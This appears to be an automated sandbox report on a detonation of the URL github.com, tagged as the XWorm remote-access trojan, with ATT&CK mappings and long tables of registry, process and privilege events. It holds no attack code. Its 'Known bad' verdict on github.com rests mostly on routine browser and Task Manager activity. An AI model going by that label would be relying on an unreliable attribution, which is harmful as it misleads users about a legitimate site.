Malware Analysis Report

2024-09-11 13:46

Sample ID 240614-kbbjvasdjg
Target https://github.com
Tags
xworm execution rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://github.com was found to be: Known bad.

Malicious Activity Summary

xworm execution rat trojan

Detect Xworm Payload

Xworm

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Legitimate hosting services abused for malware hosting/C2

Modifies registry class

Suspicious use of WriteProcessMemory

Checks processor information in registry

Suspicious use of SendNotifyMessage

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of FindShellTrayWindow

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Privilege Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Discovery
TA0007
Query Registry
T1012
Peripheral Device Discovery
T1120
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Web Service
T1102
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-14 08:25

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-14 08:25

Reported

2024-06-14 08:31

Platform

win10v2004-20240611-en

Max time kernel

369s

Max time network

371s

Command Line

"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://github.com

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A camo.githubusercontent.com N/A N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\system32\taskmgr.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName C:\Windows\system32\taskmgr.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\system32\taskmgr.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\taskmgr.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133628271634927604" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3169499791-3545231813-3156325206-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\taskmgr.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A
N/A N/A C:\Windows\system32\taskmgr.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1404 wrote to memory of 328 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 328 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
PID 1404 wrote to memory of 2896 N/A C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe
